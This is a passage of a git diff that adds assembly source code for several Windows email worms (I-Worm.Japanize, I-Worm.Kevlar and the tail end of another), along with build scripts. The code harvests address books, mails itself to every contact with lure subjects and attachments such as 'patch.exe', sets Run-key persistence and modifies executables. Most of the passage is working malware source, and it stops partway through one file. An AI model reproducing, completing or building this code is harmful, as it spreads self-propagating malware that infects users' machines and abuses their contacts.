lSnapshot + api Process32First +check_process: + test eax,eax + jz end_process + push ecx + mov eax,ProcessID + push offset uProcess + cmp eax,[uProcess.th32ProcessID] + je NextProcess + lea ebx,[uProcess.szExeFile] + + push ebx + push offset new_name + api lstrcpy + mov edi,offset new_name + push edi + api lstrlen + add edi,eax + mov eax,"mth." + stosd + xor eax,eax + stosd + push offset new_name + @pushsz "System.htm" + api lstrcmp + test eax,eax + jz NextProcess + + push 0 + push 1 + push 2 + push 0 + push 1 + push 40000000h + push offset new_name + api CreateFileA + mov ebp,eax + push 0 + push offset byte_write + push e_htm - s_htm + push offset s_htm + push ebp + api WriteFile + push ebp + api CloseHandle + +NextProcess: + push offset uProcess + push lSnapshot + api Process32Next + jmp check_process +end_process: + push lSnapshot + api CloseHandle +end_inf_process: + pushad + ret +inf_process EndP + + +cr_vbsname Proc + mov edi,offset vbsname +; api GetTickCount + push 10 + pop ecx +; xor edx,edx +; div ecx +; inc edx +; mov ecx,edx + name_g: + push ecx + api GetTickCount + push '9'-'0' + pop ecx + xor edx,edx + div ecx + xchg eax,edx + add al,'0' + stosb + api GetTickCount + push 100 + pop ecx + xor edx,edx + div ecx + push edx + api Sleep + pop ecx + loop name_g + mov eax,"sbv." + stosd + ret +cr_vbsname EndP + + + +.data +ffile WIN32_FIND_DATA +sysTime db 16 dup(0) + +uProcess PROCESSENTRY32 +ProcessID dd ? +lSnapshot dd ? +new_name db 100 dup (?) + +orgwrm db 50 dup (0) +cpywrm db 50 dup (0) +msgwrm db 50 dup (0) +startup db 70 dup (0) +personal db 70 dup (0) +new_file db 90 dup (0) +vbsname db 20 dup (0) +byte_write dd ? +hfind dd ? + +s_mirc: db "[script]",CRLF + db ";Don't edit this file.",CRLF,CRLF + db "n0=on 1:JOIN:{",CRLF + db "n1= /if ( $nick == $me ) { halt }",CRLF + db "n2= /.dcc send $nick " +mirc_exe db 50 dup (?) + db CRLF,"n3=}",0 +e_mirc: + + +s_htm: db '',CRLF + db 'Windows Media Player',CRLF + db '',0 +e_htm: + +s_vbs: db 'On Error Resume Next',CRLF + db 'Set terqne = CreateObject("Scripting.FileSystemObject")',CRLF + db 'Set qumhzh = CreateObject("WScript.Shell")',CRLF + db 'Set sys = terqne.GetSpecialFolder(1)',CRLF + db 'copyname = sys&"\FunnyGame.exe"',CRLF + db 'Set htgx = CreateObject("Outlook.Application")',CRLF + db 'Set ofcc = htgx.GetNameSpace("MAPI")',CRLF + db 'For each c In ofcc.AddressLists',CRLF + db 'If c.AddressEntries.Count <> 0 Then',CRLF + db 'For d = 1 To c.AddressEntries.Count',CRLF + db 'Set etldb = htgx.CreateItem(0)',CRLF + db 'etldb.To = c.AddressEntries(d).Address',CRLF + db 'etldb.Subject = "New game from the net for you " & c.AddressEntries(d).Name',CRLF + db 'etldb.Body = "Play at this funny game. It''s very cool !"',CRLF + db 'etldb.Attachments.Add(copyname)',CRLF + db 'etldb.DeleteAfterSubmit = True',CRLF + db 'If etldb.To <> "" Then',CRLF + db 'etldb.Send',CRLF + db 'End If',CRLF + db 'Next',CRLF + db 'End If',CRLF + db 'Next',0 +e_vbs: + +ends +end start + +************************************************************************* + +@tasm32 /M /ML haram.asm +@tlink32 -Tpe -aa -c -x haram.obj,,,import32,haram.def +rem pause +rem upx -9 haram.exe +@del *.obj +rem pause + +************************************************************************* + +IMPORTS + +SHLWAPI.SHSetValueA +SHELL32.SHGetSpecialFolderPathA \ No newline at end of file diff --git a/Win32/I-Worm.Japanize.asm b/Win32/I-Worm.Japanize.asm new file mode 100644 index 00000000..b1bf8c01 --- /dev/null +++ b/Win32/I-Worm.Japanize.asm @@ -0,0 +1,857 @@ +;;; XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX +;;; I-Worm.Japanize +;;; XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX +;;; +;;; +;;; This has some bugs. +;;; +;;; Here TrendMicro description: +;;; ****************************************************************** +;;; http://www.antivirus.com/vinfo/virusencyclo/default5.asp?VName=WORM_FBOUND.B&VSect=T +;;; Details: +;;;The details of the email this worm arrives with may be as follows: +;;; +;;;To: +;;;Subject: <"Important" or random Japanese text(applicable on Japanese supported platforms)> +;;;Message Body: +;;;Attachment: patch.exe +;;; +;;;It uses its own SMTP engine and uses the following registry key to retrieve the default SMTP server of the infected system: +;;;HKEY_CURRENT_USER\Software\Microsoft\ +;;;Internet Account Manager\Accounts\00000001 +;;; +;;;It uses the following registry key to retrieve email addresses from the infected user's Windows Address Book (WAB): +;;;HKEY_CURRENT_USER\Software\Microsoft\WAB\ +;;;WAB4Wab File Name = gh +;;; +;;;The email arrives with the attachment PATCH.EXE. If the email address of its target ;;;user ends with the extension .jp, the worm randomly selects a phrase, from a list of 17 possible Japanese phrases below, and uses one as the subject of the email: +;;; +;;; +;;;The English translation for the above Japanese text are as follows: +;;;Re: the issue that you mentioned +;;;Re: important +;;;Re: long time no see +;;;Re: top secret +;;;Re: Hello +;;;Re: important information +;;;Re: data +;;;the issue that you mentioned +;;;important +;;;long time no see +;;;top secret +;;;hello +;;;important information +;;;data +;;;frog +;;;shit +;;;shit +;;; +;;;Otherwise, it uses the subject gImportant." +;;; +;;;This non-destructive worm does not drop files or create any registry entries. Its propagation depends on the execution of the file attachment in the email. +;;; +;;;The following text strings are found in the worm body: +;;; +;;;eXXXXXXXXXXXXXXXXXXXXXXXf +;;;eXXXXX I-Worm.Japanize XXXXXf +;;;eXXXXXXXXXXXXXXXXXXXXXXXf +;;; +;;; + + .586p + .model flat + locals + jumps + + +;;; some lazy shit +callW macro @@@x + extrn @@@x:proc + call @@@x +endm + +ofs equ offset + +dwo equ dword ptr +wo equ word ptr +by equ byte ptr + +HKEY_CURRENT_USER EQU 80000001h +CRLF equ <13,10> +rdtsc equ +AF_INET equ 2 +SOCK_STREAM equ 1 + +FILE_ATTRIBUTE_NORMAL EQU 00000080h +GENERIC_READ EQU 80000000h +GENERIC_WRITE EQU 40000000h +PAGE_READONLY EQU 00000002h +PAGE_READWRITE EQU 00000004h +FILE_MAP_READ EQU 00000004h +OPEN_EXISTING EQU 00000003h +GHND EQU 042h +FILE_SHARE_READ EQU 00000001h +FILE_SHARE_WRITE EQU 00000002h + + +;;; ---------------------------------------------------------------- + .data +hReg dd ?; registry handle +str_SMInternetAccountManager db 'Software\Microsoft\Internet Account Manager',0 +str_SMIAccounts db 'Software\Microsoft\Internet Account Manager\Accounts\' +AccountIdx db 9 dup(?); account index +bufsiz_accountidx dd 9; size + +str_DMA db 'Default Mail Account',0 +str_SMTPNAME db 'SMTP Server',0 +str_SMTPEmailAddr db 'SMTP Email Address',0 +str_SMWab4 db 'Software\Microsoft\WAB\WAB4\Wab File Name',0 + + +SMTP_Server db 50 dup(?) ; default smtp server +bufsiz_SMTPSERVER dd 50 +morons_Mailaddr db 256 dup(?) ; mail address of moron :) +bufsiz_morons_mailaddr dd 256 +wab4_path db 260 dup(?); wab file path +bufsiz_wab4_path dd 260 + +buffer db 1000 dup(?) + +hwab4file dd ? ; wab4 file handle +hwab4map dd ? ; +hwab4mapview dd ? ; + +myfilename db 260 dup(?) ; handle of myself +hmyfile dd ? +fsize dd ? ; file size + +hmemout0 dd ? +ptr_myself dd ? +hmemout dd ? ; globalalloc +ptr_base64buf dd ? ; globallock + +target_mailaddr db 48h dup(?) ; + +sockaddr_in label byte ; + sin_family dw ? + sin_port dw ? + sin_addr dd ? + sin_zero db 8 dup(?) +len_sockaddr_in = $ - ofs sockaddr_in + +sock dd ? ; socket descriptor + +recv_buffer db 1024 dup(?) ; recv buffer + +jflag dd 0 ; japanese or not + +smtp_HELO db 'HELO localhost',CRLF +len_smtp_HELO = $ - ofs smtp_HELO +smtp_MAIL_FROM db 'MAIL FROM: ' +len_smtp_MAIL_FROM = $ - ofs smtp_MAIL_FROM +;crlf +smtp_RCPT_TO db 'RCPT TO: ' +len_smtp_RCPT_TO = $ - ofs smtp_RCPT_TO +;crlf +smtp_DATA db 'DATA',CRLF +len_smtp_DATA = $ - ofs smtp_DATA +smtp_BODY_FROM db 'FROM: ' +len_smtp_BODY_FROM = $ - ofs smtp_BODY_FROM +smtp_BODY_TO db CRLF,'TO: ' +len_smtp_BODY_TO = $ - ofs smtp_BODY_TO +smtp_BODY_SUBJECT db CRLF,'SUBJECT: Important',CRLF +len_smtp_BODY_SUBJECT = $ - ofs smtp_BODY_SUBJECT + +smtp_DOT_CRLF db '.',CRLF +len_smtp_DOT_CRLF = $ - ofs smtp_DOT_CRLF +smtp_QUIT db 'QUIT',CRLF +len_smtp_QUIT = $ - ofs smtp_QUIT + +smtp_crlf db CRLF + +smtp_MIME_h db 'MIME-Version: 1.0',CRLF + db 'Content-Type: multipart/mixed; boundary="Boundary-a8dfidaoRadvfuck"',CRLF + db CRLF + db '--Boundary-a8dfidaoRadvfuck',CRLF + db 'Content-Type: text/plain; charset=iso-2022-jp',CRLF + db 'Content-Transfer-Encoding: 7bit',CRLF + db 'Content-Description: Mail message body',CRLF + db CRLF + db CRLF ; text + db CRLF + db '--Boundary-a8dfidaoRadvfuck',CRLF + db 'Content-Type: application/x-msdownload; name="patch.exe"',CRLF + db 'Content-Disposition: attachment; filename="patch.exe"',CRLF + db 'Content-Transfer-Encoding: BASE64',CRLF + db CRLF +len_smtp_MIME_h = $ - ofs smtp_MIME_h + ;; base64 body +smtp_MIME_e db CRLF,'--Boundary-a8dfidaoRadvfuck--',CRLF,CRLF +len_smtp_MIME_e = $ - ofs smtp_MIME_e + +r_seed dd 10987293h ; random seed + + +smtp_jsubject_1 db CRLF,'SUBJECT: =?ISO-2022-JP?B?' +len_smtp_jsubject_1 = $ - ofs smtp_jsubject_1 +smtp_jsubject_2 db '?=',CRLF +len_smtp_jsubject_2 = $ - ofs smtp_jsubject_2 + + +;;; japanese subjects table +japanese_subjects label byte + dd ofs js_01 + dd ofs js_02 + dd ofs js_03 + dd ofs js_04 + dd ofs js_05 + dd ofs js_06 + dd ofs js_07 + dd ofs js_08 + dd ofs js_09 + dd ofs js_10 + dd ofs js_11 + dd ofs js_12 + dd ofs js_13 + dd ofs js_14 + dd ofs js_15 + dd ofs js_16 + dd ofs js_17 +num_of_jsub = ($ - ofs japanese_subjects)/4 +js_01 db 'GyRCPUVNVxsoQg==',0 ; dv +js_02 db 'UmU6GyRCPUVNVxsoQg==',0; Re:dv +js_03 db 'GyRCPUVNVyRKJCpDTiRpJDsbKEI=',0; dvȂm点 +js_04 db 'UmU6GyRCPUVNVyRKJCpDTiRpJDsbKEI=',0; Re:dvȂ点 +js_05 db 'GyRCTmMkTjdvGyhC',0 ; ̌ +js_06 db 'UmU6GyRCTmMkTjdvGyhC',0; Re:̌ +js_07 db 'GyRCJCo1VyQ3JFYkaiRHJDkbKEI=',0; vԂł +js_08 db 'UmU6GyRCJCo1VyQ3JFYkaiRHJDkbKEI=',0; Re:vԂł +js_09 db 'GyRCJDMkcyRLJEEkTxsoQg==',0; ɂ +js_10 db 'UmU6GyRCJDMkcyRLJEEkTxsoQg==',0; Re:ɂ +js_11 db 'GyRCNktIaxsoQg==',0 ; ɔ +js_12 db 'UmU6GyRCNktIaxsoQg==',0; Re:ɔ +js_13 db 'GyRCO3FOQRsoQg==',0 ; +js_14 db 'UmU6GyRCO3FOQRsoQg==',0; Re: +js_15 db 'GyRCMz8bKEI=',0 ; +js_16 db 'GyRCJSYlYxsoQlI=',0 ; E\R +js_17 db 'GyRCJCYkcyQzGyhC',0 ; + + .code +start: + callW GetTickCount + mov dwo [r_seed],eax + jmp @@go + ;; signature :) + db 'XXXXXXXXXXXXXXXXXXXXXXXXXXX',0 + db 'XXXXX I-Worm.Japanize XXXXX',0 + db 'XXXXXXXXXXXXXXXXXXXXXXXXXXX',0 + @@go: + call get_some_info + + push ofs buffer + push 0101h + callW WSAStartup + test eax,eax + jnz exit + + call open_wab + test eax,eax + jnz clean_sock + + call create_base64enc + + call spread + +free_mem: + push dwo [ptr_base64buf] + callW GlobalUnlock + push dwo [hmemout] + callW GlobalFree + +close_wab4: + push dwo [hwab4file] + push dwo [hwab4map] + push dwo [hwab4mapview] + callW CloseHandle + callW CloseHandle + callW CloseHandle + +clean_sock: + callW WSACleanup + +exit: + push 0 + callW ExitProcess + + + +spread: + ;; lifewire ;) + mov esi,dwo [hwab4mapview] + mov ecx,[esi+64h] ; num of addr + jecxz @@exit + add esi,[esi+60h] ; ptr to addr + + @@spread_loop: + push ecx + + mov eax,esi + cmp by [esi+1],0 + jne @@nounicode + push esi + lea edi,target_mailaddr + push edi + + push 48h + pop ecx + @@1: + lodsw + stosb + loop @@1 + + pop eax + pop esi + add esi,20h + + @@nounicode: + call spread2 + + add esi,24h + pop ecx + loop @@spread_loop + + @@exit: + ret + + +spread2: + push esi + mov esi,eax ; now esi=email addr + + push 0 + push 1 + push 2 + callW socket + mov dwo [sock],eax + + mov wo [sin_family],AF_INET + mov ax,25 + xchg al,ah + mov wo [sin_port],ax + + push ofs SMTP_Server + callW gethostbyname + test eax,eax + jz @@exit + + mov eax,[eax+12] + mov eax,[eax] + mov eax,[eax] + + mov dwo [sin_addr],eax + push len_sockaddr_in + lea eax,sockaddr_in + push eax + push dwo [sock] + callW connect + test eax,eax + jnz @@exit + + call sendmail + + @@exit: + pop esi + ret + + +;;; --- +;;; reg stuff +get_some_info: + xor ebx,ebx + + push ofs hReg + push 1 + push ebx + push ofs str_SMInternetAccountManager + push HKEY_CURRENT_USER + callW RegOpenKeyExA + test eax,eax + jnz @@error + + push ofs bufsiz_accountidx + push ofs AccountIdx + push ebx + push ebx + push ofs str_DMA + push dwo [hReg] + callW RegQueryValueExA + test eax,eax + jnz @@error + + push dwo [hReg] + callW RegCloseKey + + push ofs hReg + push 1 + push ebx + push ofs str_SMIAccounts + push HKEY_CURRENT_USER + callW RegOpenKeyExA + test eax,eax + jnz @@error + + push ofs bufsiz_SMTPSERVER + push ofs SMTP_Server + push ebx + push ebx + push ofs str_SMTPNAME + push dwo [hReg] + callW RegQueryValueExA + test eax,eax + jnz @@error + + push ofs bufsiz_morons_mailaddr + push ofs morons_Mailaddr + push ebx + push ebx + push ofs str_SMTPEmailAddr + push dwo [hReg] + callW RegQueryValueExA + test eax,eax + jnz @@error + + push dwo [hReg] + callW RegCloseKey + + push ofs hReg + push 1 + push ebx + push ofs str_SMWab4 + push HKEY_CURRENT_USER + callW RegOpenKeyExA + test eax,eax + jnz @@error + + push ofs bufsiz_wab4_path + push ofs wab4_path + push ebx + push ebx + push ebx + push dwo [hReg] + callW RegQueryValueExA + test eax,eax + jnz @@error + + push dwo [hReg] + callW RegCloseKey + xor eax,eax + ret + @@error: + xor eax,eax + dec eax + ret + + +open_wab: + xor ebx,ebx + push ebx + push FILE_ATTRIBUTE_NORMAL + push OPEN_EXISTING + push ebx + push FILE_SHARE_WRITE + push GENERIC_READ + push ofs wab4_path + callW CreateFileA + inc eax + jz @@error + dec eax + mov dwo [hwab4file],eax + + push ebx + push ebx + push ebx + push PAGE_READONLY + push ebx + push eax + callW CreateFileMappingA + mov dwo [hwab4map],eax + + push ebx + push ebx + push ebx + push FILE_MAP_READ + push eax + callW MapViewOfFile + mov dwo [hwab4mapview],eax + xor eax,eax + ret + @@error: + xor eax,eax + dec eax + ret + +create_base64enc: + push 260 + push ofs myfilename + push 0 + callW GetModuleFileNameA + + xor ebx,ebx + push ebx + push FILE_ATTRIBUTE_NORMAL + push OPEN_EXISTING + push ebx + push FILE_SHARE_READ + push GENERIC_READ + push ofs myfilename + callW CreateFileA + inc eax + jz @@error + dec eax + mov dwo [hmyfile],eax + + push 0 + push dwo [hmyfile] + callW GetFileSize + mov dwo [fsize],eax + + add eax,100h + push eax + push GHND + callW GlobalAlloc + mov dwo [hmemout0],eax + + push eax + callW GlobalLock + mov dwo [ptr_myself],eax + + push 0 + push ofs recv_buffer + push dwo [fsize] + push eax + push dwo [hmyfile] + callW ReadFile + test eax,eax + jz @@eexit + + push 0 + push dwo [hmyfile] + callW GetFileSize + push eax ; save size + + shl eax,1 ; eax*2 + + push eax + push GHND + callW GlobalAlloc + mov dwo [hmemout],eax + + push eax + callW GlobalLock + mov dwo [ptr_base64buf],eax + +; pop ebx ; restore size +; push ebx ; size + push eax + push dwo [ptr_myself] + call base64encode + + + push dwo [hmyfile] + callW CloseHandle + + push dwo [ptr_myself] + callW GlobalUnlock + push dwo [hmemout0] + callW GlobalFree + + xor eax,eax + ret + + @@eexit: + push dwo [hmyfile] + callW CloseHandle + + push dwo [ptr_myself] + callW GlobalUnlock + push dwo [hmemout0] + callW GlobalFree + + @@error: + xor eax,eax + dec eax + ret + +base64encode proc pascal + arg @@src + arg @@dest + arg @@srclen + + mov esi,dwo [@@src] + mov edi,dwo [@@dest] + + @@b64loop: + xor eax,eax + cmp dwo [@@srclen],1 + jne @@srclen2 + lodsb + push 2 + pop ecx + mov edx,03D3Dh ; == + dec dwo [@@srclen] + jmp @@b64next + + @@srclen2: + cmp dwo [@@srclen],2 + jne @@srclen3 + lodsw + push 3 + pop ecx + push 03dh + pop edx + sub dwo [@@srclen],2 + jmp @@b64next + @@srclen3: + lodsd + push 4 + pop ecx + xor edx,edx + dec esi + sub dwo [@@srclen],3 + + @@b64next: + bswap eax + + @@b64n_loop: + mov ebx,eax + and eax,0FC000000h + rol eax,6 + mov al,[@@b64table + eax] + stosb + mov eax,ebx + shl eax,6 + dec ecx + jnz @@b64n_loop + + cmp dwo [@@srclen],0 + ja @@b64loop + + mov eax,edx + stosd + ret + + @@b64table db "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/" + endp + + +g_send: + ;; in + ;; ecx = size + ;; esi = ptr to data + ;; out + ;; eax = ret value of send() + push 0 + push ecx + push esi + push dwo [sock] + callW send + ret + +g_recv: + ;; out + ;; error -> eax=-1 success -> eax = 0 + @@again: + push 0 + push 1024 + push ofs recv_buffer + push dwo [sock] + callW recv + inc eax + jz @@recv_error + cmp eax,1024 + jz @@again + xor eax,eax + ret + @@recv_error: + xor eax,eax + dec eax + ret + + +sendmail: + ;; yea. lame routine ;) + push esi ; mail addr + mov dwo [jflag],0 ; flag for .jp + ;; + call g_recv + + ;; + lea esi,smtp_HELO + mov ecx,len_smtp_HELO + call g_send + + call g_recv + + ;; + lea esi,smtp_MAIL_FROM + mov ecx,len_smtp_MAIL_FROM + call g_send + + push ofs morons_Mailaddr + callW lstrlen + mov ecx,eax + lea esi,morons_Mailaddr + call g_send + mov ecx,2 + lea esi,smtp_crlf + call g_send + + call g_recv + ;; + mov ecx,len_smtp_RCPT_TO + lea esi,smtp_RCPT_TO + call g_send + + pop esi + push esi + + push esi + callW lstrlen + push eax ; save + mov ecx,eax + call g_send + + mov ecx,2 + lea esi,smtp_crlf + call g_send + + call g_recv + + ;; .jp? + pop eax ; len of mail address + pop esi + push esi ; mail address + add esi,eax + sub esi,3 + cmp dwo [esi],00706a2eh ; .jp? + jne @@1 + inc dwo [jflag] + @@1: + ;; + + lea esi,smtp_DATA + mov ecx,len_smtp_DATA + call g_send + + call g_recv + ;; + + lea esi,smtp_BODY_FROM + mov ecx,len_smtp_BODY_FROM + call g_send + + push ofs morons_Mailaddr + callW lstrlen + mov ecx,eax + lea esi,morons_Mailaddr + call g_send + + lea esi,smtp_BODY_TO + mov ecx,len_smtp_BODY_TO + call g_send + + pop esi + push esi + + push esi + callW lstrlen + mov ecx,eax + call g_send + + cmp dwo [jflag],0 + jnz @@jsubject + + mov ecx,len_smtp_BODY_SUBJECT + lea esi,smtp_BODY_SUBJECT + call g_send + jmp @@body + + @@jsubject: + ;; gen subject + mov ecx,len_smtp_jsubject_1 + lea esi,smtp_jsubject_1 + call g_send + + mov esi,(num_of_jsub-1) + call rng + lea esi,japanese_subjects + mov esi,dwo [esi+eax*4] + push esi + callW lstrlen + mov ecx,eax + call g_send + + mov ecx,len_smtp_jsubject_2 + lea esi,smtp_jsubject_2 + call g_send + + + + @@body: + lea esi,smtp_MIME_h + mov ecx,len_smtp_MIME_h + call g_send + + mov esi,dwo [ptr_base64buf] + push esi + push esi + callW lstrlen + pop esi + mov ecx,eax + call g_send + + lea esi,smtp_MIME_e + mov ecx,len_smtp_MIME_e + call g_send + + + mov ecx,len_smtp_DOT_CRLF + lea esi,smtp_DOT_CRLF + call g_send + + call g_recv + ;; + + mov ecx,len_smtp_QUIT + lea esi,smtp_QUIT + call g_send + + call g_recv + pop esi + + ret + + +rng: + ;; in + ;; esi = range + ;; out + ;; eax = random number + rdtsc + xor eax,edx + imul eax,dwo [r_seed] + dec eax + mov dwo [r_seed],eax + xor edx,edx + div esi + mov eax,edx + ret + +end start + +************************************************************************* + +@ECHO OFF +TASM32 /ml /m /z japanize.asm,japanize.obj +TLINK32 -x -aa -Tpe japanize.obj,,,%import32.lib +DEL *.OBJ diff --git a/Win32/I-Worm.Kevlar.asm b/Win32/I-Worm.Kevlar.asm new file mode 100644 index 00000000..5a5b3ff1 --- /dev/null +++ b/Win32/I-Worm.Kevlar.asm @@ -0,0 +1,651 @@ +comment # +Name : I-Worm.Kevlar +Author : PetiK +Date : August 7th 2001 - August 16th 2001 +Size : 5120 byte + +Action : Copy itself to %System%\Kevlar32.exe hidden attribute + %System%\MScfg32.exe normal attribute + Add HKLM\Software\Microsoft\Windows\CurrentVersion\Run\Kevlar32 = %System%\Kevlar32.exe + + * Infect %Windir%\C???????.exe file on writing as "PetiK" in the file + * Infect %Windir%\*.exe It add .htm and create a new file with ActiveX + * Create C:\__.vbs This filetake all address in th e Address Book at save them in the + %windir%\AddBook.txt. The worm scan this file to find the address and send a new mail : + + Subject : Windows Protect !! + Body : The smallest software to stop your computer to bug in each time. + I have found this program on WWW.KEVLAR-PROTECT.COM + + Take a look at the attchment. + + Bye and have a nice day. + + Attachment : MScfg32.exe + + * It creates the %windir%\MSinfo32.txt. I look like this : + + [File Infected] => Name of C???????.exe file infected + CLEANMGR.EXE=Infected by W32.Kevlar.PetiK + CVTAPLOG.EXE=Infected by W32.Kevlar.PetiK + + [EMail saved] => Some address found in the address book + first@mail.com=Next victim + second@mail.com=Next victim + + +To build the worm: +tasm32 /M /ML Kevlar +tlink32 -Tpe -aa -x Kevlar,,,import32 +upx -9 Kevlar.exe + +To delete the worm: +@echo off +del %windir%\system\Kevlar32.exe +del %windir%\system\MScfg32.exe +del %windir%\*.exe.htm +del %windir%\MSinfo32.txt +del %windir%\AddBook.txt + +# + +.586p +.model flat +.code + +JUMPS + +callx macro a +extrn a:proc +call a +endm + +include useful.inc + +DEBUT: +F_NAME: push 50 + mov esi,offset Orig + push esi + push 0 + callx GetModuleFileNameA + + mov edi,offset CopyName2 + push edi + push 50 + push edi + callx GetSystemDirectoryA + add edi,eax + mov eax,'cSM\' + stosd + mov eax,'23gf' + stosd + mov eax,'exe.' + stosd + pop edi + push 0 + push edi + push esi + callx CopyFileA + + mov edi,offset CopyName + push edi + push 50 + push edi + callx GetSystemDirectoryA + add edi,eax + mov al,'\' + stosb + mov eax,'lveK' + stosd + mov eax,'23ra' + stosd + mov eax,'exe.' + stosd + pop edi + + push esi + callx GetFileAttributesA + cmp eax,1 + je SUITE + + push 0 + push edi + push esi + callx CopyFileA + + push 01h + push edi + callx SetFileAttributesA + + +REG: pushad + @pushsz "SHLWAPI.dll" + callx LoadLibraryA + test eax,eax + jz FIN + mov edi,eax + @pushsz "SHSetValueA" + push edi + callx GetProcAddress + test eax,eax + jz FIN + mov esi,eax + push 08h + push offset CopyName + push 01h + @pushsz "Kevlar32" + @pushsz "SOFTWARE\Microsoft\Windows\CurrentVersion\Run" + push 80000002h + call esi + push edi + callx FreeLibrary + popad + + call Nick + + mov edi,offset nickname + push 40h + @pushsz "Hello, my name is :" + push edi + push 0 + callx MessageBoxA + + call Infect + + jmp FIN + +SUITE: call Infect2 +VB_F: pushad + push 00h + push 80h + push 02h + push 00h + push 01h + push 40000000h + @pushsz "C:\__.vbs" + callx CreateFileA + test eax,eax + xchg edi,eax + push 00h + push offset octets + push VBSSIZE + push offset vbsd + push edi + callx WriteFile + push edi + callx CloseHandle + popad + push 1 + @pushsz "wscript C:\__.vbs" + callx WinExec + push 10000 + callx Sleep + @pushsz "C:\__.vbs" + callx DeleteFileA + +SCAN1: mov edi,offset addbook + push edi + push 50 + push edi + callx GetWindowsDirectoryA + add edi,eax + mov eax,"ddA\" + stosd + mov eax,"kooB" + stosd + mov eax,"txt." + stosd + xor eax,eax + stosd + call OPEN + +FIN: push 00h + callx ExitProcess + + Nick Proc + mov edi,offset nickname + callx GetTickCount + push 9 + pop ecx + xor edx,edx + div ecx + inc edx + mov ecx,edx + name_g: + push ecx + callx GetTickCount + push 'Z'-'A' + pop ecx + xor edx,edx + div ecx + xchg eax,edx + add al,'A' + stosb + callx GetTickCount + push 100 + pop ecx + xor edx,edx + div ecx + push edx + callx Sleep + pop ecx + loop name_g + ret + Nick EndP + + Infect Proc + pushad + push 50 + push offset WinPath + callx GetWindowsDirectoryA + push offset WinPath + callx SetCurrentDirectoryA + FFF: + push offset Search + @pushsz "C???????.exe" + callx FindFirstFileA + inc eax + je F_INF + dec eax + mov [exeHdl],eax + I_FILE: + mov verif,0 + xor eax,eax + push eax + push eax + push 03h + push eax + push eax + push 80000000h or 40000000h + push offset Search.cFileName + callx CreateFileA + inc eax + jz FNF + dec eax + xchg eax,ebx + + xor eax,eax + push eax + push eax + push eax + push 04h + push eax + push ebx + callx CreateFileMappingA + test eax,eax + jz CL1 + xchg eax,ebp + + xor eax,eax + push eax + push eax + push eax + push 06h + push ebp + callx MapViewOfFile + test eax,eax + jz CL2 + xchg eax,edi + + mov esi,eax + cmp word ptr [esi],"ZM" + jne CL2 + cmp byte ptr [esi+18h],"@" + jne CL2 + cmp word ptr [esi+80h],"EP" + jne CL2 + cmp byte ptr [esi+12h],"P" + je CL2 + mov word ptr [esi+12h],"eP" + mov word ptr [esi+14h],"it" + mov byte ptr [esi+16h],"K" + inc verif + push edi + callx UnmapViewOfFile + CL2: + push ebp + callx CloseHandle + CL1: + push ebx + callx CloseHandle + + cmp verif,1 + jne FNF + mov edi,offset InfoFile + push edi + push 50 + push edi + callx GetWindowsDirectoryA + add edi,eax + mov eax,'iSM\' + stosd + mov eax,'3ofn' + stosd + mov eax,'xt.2' + stosd + mov al,'t' + stosb + pop edi + mov esi,edi + push esi + @pushsz "Infected by W32.Kevlar.PetiK" + push offset Search.cFileName + @pushsz "File Infected" + callx WritePrivateProfileStringA + + FNF: + push offset Search + push [exeHdl] + callx FindNextFileA + test eax,eax + jne I_FILE + FC: + push [exeHdl] + callx FindClose + F_INF: + popad + ret + Infect EndP + + Infect2 Proc + pushad + push 50 + push offset WinPath + callx GetWindowsDirectoryA + push offset WinPath + callx SetCurrentDirectoryA + FFF2: + push offset Search + @pushsz "*.exe" + callx FindFirstFileA + inc eax + je F_INF2 + dec eax + mov [exeHdl],eax + I_FILE2: + pushad + mov edi,offset Search.cFileName + push edi + callx lstrlen + add edi,eax + mov eax,"mth." + stosd + xor eax,eax + stosd + push 00h + push 80h + push 02h + push 00h + push 01h + push 40000000h + push offset Search.cFileName + callx CreateFileA + test eax,eax + xchg ebp,eax + push 00h + push offset octets + push HTMSIZE + push offset htmd + push ebp + callx WriteFile + push ebp + callx CloseHandle + popad + FNF2: + push offset Search + push [exeHdl] + callx FindNextFileA + test eax,eax + jne I_FILE2 + FC2: + push [exeHdl] + callx FindClose + F_INF2: + popad + ret + Infect2 EndP + +OPEN: pushad + push 00h + push 80h + push 03h + push 00h + push 01h + push 80000000h + push offset addbook + callx CreateFileA + inc eax + je NO + dec eax + xchg eax,ebx + + xor eax,eax + push eax + push eax + push eax + push 02h + push eax + push ebx + callx CreateFileMappingA + test eax,eax + je F1 + xchg eax,ebp + + xor eax,eax + push eax + push eax + push eax + push 04h + push ebp + callx MapViewOfFile + test eax,eax + je F2 + xchg eax,esi + + push 00h + push ebx + callx GetFileSize + cmp eax,03h + jbe F3 ; is the file empty ?? + + call SCAN + +F3: push esi + callx UnmapViewOfFile +F2: push ebp + callx CloseHandle +F1: push ebx + callx CloseHandle +NO: popad + ret + + SCAN: + pushad + xor edx,edx + mov edi,offset m_addr + push edi + p_c: lodsb + cmp al," " + je car_s + cmp al,0dh + je entr1 + cmp al,0ah + je entr2 + cmp al,"!" + je f_mail + cmp al,"@" + je not_a + inc edx + not_a: stosb + jmp p_c + car_s: inc esi + jmp p_c + entr1: xor al,al + stosb + pop edi + test edx,edx + je SCAN + call SEND_MAIL + jmp SCAN + entr2: xor al,al + stosb + pop edi + jmp SCAN + f_mail: popad + ret + + SEND_MAIL: + push 50 + push offset save_addr + callx GetWindowsDirectoryA + @pushsz "\MSinfo32.txt" + push offset save_addr + callx lstrcat + push offset save_addr + @pushsz "Next victim" + push offset m_addr + @pushsz "EMail saved" + callx WritePrivateProfileStringA + xor eax,eax + push eax + push eax + push offset Message + push eax + push [MAPIHdl] + callx MAPISendMail + ret + + + +.data +; ===== INSTALLATION ===== +Orig db 50 dup (0) +CopyName db 50 dup (0) +CopyName2 db 50 dup (0) +nickname db 11 dup (?) + +; ===== INFECTION ===== +InfoFile db 50 dup (0) +WinPath db 50 dup (0) +exeHdl dd ? +verif dd ? +octets dd ? + +; ===== MAIL ===== +addbook db 50 dup (0) +save_addr db 50 dup (0) +m_addr db 128 dup (?) +MAPIHdl dd 0 +subject db "Windows Protect !!",00h +body db "The smallest software to stop your computer to bug in each time.",0dh,0ah + db "I have found this program on WWW.KEVLAR-PROTECT.COM",0dh,0ah,0dh,0ah + db "Take a look at the attchment.",0dh,0ah,0dh,0ah + db 